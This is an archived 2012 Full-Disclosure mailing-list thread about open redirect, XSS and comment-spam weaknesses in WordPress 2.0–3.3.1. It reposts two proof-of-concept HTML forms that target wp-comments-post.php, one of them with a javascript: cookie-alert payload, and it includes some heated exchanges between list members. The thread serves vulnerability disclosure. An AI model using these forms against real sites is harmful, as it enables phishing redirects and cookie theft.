[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress

To: Benji <me@xxxxxxxxx>
Subject: Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
From: InterN0T Advisories <advisories@xxxxxxxxxxxx>
Date: Sat, 05 May 2012 19:55:09 -0400

I don't really get how you can compare Jehovahs witnesses or any other
religion to a discussion about mailing list spam blackhat-seo style made to
increase traffic and backlinks to Mustlive's website. Not only are
MustLive's "advisories" mostly annoying it's also making other web
application security researchers look like a joke.

InterN0T doesn't condone with illegal activities, so please keep your
personal views about the community to yourself. I'm not sure what script
kiddie means in your personal biased opinion, but there's various types of
people in the community (even pure_hate is there, and many full-time
professionals (i.e., security consultants, ethical hackers, pentesters,
developers, etc.), not just beginners. Unlike other communities that takes
hacking serious, we don't kick or ban script kiddies as long as they follow
the rules, we try to make them >learn< to improve and thereby change their
destructive and annoying behaviour. (Yes, we actually try to make a
difference.)

I'm sure you're of course a master of all arts hacker, that passed OSCE
and any other similar certifications in 5 minutes or less.



Best regards,
MaXe

On Sat, 5 May 2012 15:00:36 +0100, Benji <me@xxxxxxxxx> wrote:
> Wow, yiou're like the jehovahs witnessess of the internet.
> 
> Stop with the childish bitching and grow up. Last time I checked
> intern0t was also a script kid breeding ground.
> 
> On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories
> <advisories@xxxxxxxxxxxx> wrote:
>> Hi List,
>>
>> To stop MustLive's desperate act of trying to get visitors (and more
>> backlinks) to his website, I have for those that doesn't want to go to
>> there, just to see the PoC's but actually read them on this mailing
list
>> like almost _every other_ Proof of Concept / exploit, made them
available
>> below.
>>
>> Contents of Wordpress Redirector:
>> <html>
>> <head>
>> <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive.
>> [removed]</title>
>> </head>
>> <!-- <body onLoad="document.hack.submit()"> -->
>> <body>
>> <form name="hack" action="http://site/wp-comments-post.php";
>> method="post">
>> <input type="hidden" name="author" value="Test" />
>> <input type="hidden" name="email" value="test@xxxxxxxxx" />
>> <input type="hidden" name="comment" value="Test" />
>> <input type="hidden" name="comment_post_ID" value="1" />
>> <input type="hidden" name="redirect_to" value="http://awebsite.tld"; />
>> </form>
>> </body>
>> </html>
>> --------------------------------------
>>
>> Contents of Wordpress XSS:
>> <html>
>> <head>
>> <title>WordPress XSS exploit (lol?) (C) 2012 MustLive.
[removed]</title>
>> </head>
>> <!-- <body onLoad="document.hack.submit()"> -->
>> <body>
>> <form name="hack" action="http://site/wp-comments-post.php";
>> method="post">
>> <input type="hidden" name="author" value="Test" />
>> <input type="hidden" name="email" value="test@xxxxxxxxx" />
>> <input type="hidden" name="comment" value="Test21" />
>> <input type="hidden" name="comment_post_ID" value="1" />
>> <input type="hidden" name="redirect_to"
>> value="javascript:alert%28document.cookie%29//" />
>> </form>
>> </body>
>> </html>
>> --------------------------------------
>>
>> I don't really have any comments about these "exploits".
>>
>>
>>
>> Best regards,
>> Nemesis 3.0
>>
>>
>> On Sat, 5 May 2012 16:01:53 +0300, "MustLive"
>> <mustlive@xxxxxxxxxxxxxxxxxx>
>> wrote:
>>> Hello list!
>>>
>>> I want to warn you about security vulnerabilities in WordPress.
>>>
>>> These are Insufficient Anti-automation, Redirector and Cross-Site
>>> Scripting
>>> vulnerabilities.
>>>
>>> -------------------------
>>> Affected products:
>>> -------------------------
>>>
>>> Vulnerable are WordPress 2.0 - 3.3.1.
>>>
>>> ----------
>>> Details:
>>> ----------
>>>
>>> Already from WP 2.0 there are Insufficient Anti-automation, Redirector
>> and
>>> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just
>> when
>>> begun using WP in 2006. If the developers fixed vulnerabilities in
>>> previous
>>> two redirectors in WP 2.3, then these vulnerabilities were not fixed
>> even
>>> in
>>> WP 3.3.1
>>>
>>> IAA (WASC-21):
>>>
>>> Lack of captcha in comment form allows to conduct automated attacks.
The
>>
>>> developers still haven't put captcha in WP comments form (from the
first
>>
>>> version of engine), which besides IAA attacks, also allowed to conduct
>>> Redirector and XSS attacks.
>>>
>>> By default in WordPress the premoderation is turned on, and also there
>> is
>>> built-in anti-spam filter. But if 10 years ago the premoderation would
>> be
>>> enough, then long ago this mechanism couldn't be considered as
>> sufficient
>>> protection against spam, and anti-spam filter had efficiency less then
>> 1%
>>> -
>>> only few from spam messages he marked as spam. And also these
mechanisms
>>
>>> don't protect against below-mentioned attacks. Also plugin Akismet is
>>> bundled with WP, which is "captcha-less" protection against spam. But
by
>>
>>> default it's turned off and comparing with captcha it's considered as
>> less
>>> efficient and also doesn't protect against below-mentioned attacks.
>>>
>>> Redirector (URL Redirector Abuse) (WASC-38):
>>>
>>> Exploit:
>>>
>>> [Removed]
>>>
>>> XSS (WASC-08):
>>>
>>> Exploit:
>>>
>>> [Removed]
>>>
>>> XSS attack is possible on different browsers, but it's harder to
conduct
>>
>>> then in case of previous two redirectors (via data URI). At IIS web
>>> servers
>>> the redirect is going via Refresh header, and at other web servers -
via
>>
>>> Location header.
>>>
>>> Due to nuances of work of this script (filtering of important symbols
>> and
>>> adding of anchor), for execution of JS code it's needed to use tricky
>>> bypass
>>> methods. This complexity exists as with javascript URI, as with combo
>>> variant javascript URI + data URI.
>>>
>>> Reliable captcha protects against IAA, Redirector and XSS
>> vulnerabilities.
>>>
>>> ------------
>>> Timeline:
>>> ------------
>>>
>>> 2012.04.26 - disclosed at my site
>>>
>>> Best wishes & regards,
>>> MustLive
>>> Administrator of Websecurity web site
>>>
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
  - From: MustLive
- Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
  - From: InterN0T Advisories
- Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
  - From: Benji

Prev by Date: [Full-disclosure] Ubuntu, Linux Mint, and the Guest Account
Next by Date: Re: [Full-disclosure] Ubuntu, Linux Mint, and the Guest Account
Previous by thread: Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
Next by thread: [Full-disclosure] [CVE-2012-1990] Kerweb/Kerwin XSS vulnerabilities
Index(es):
- Date
- Thread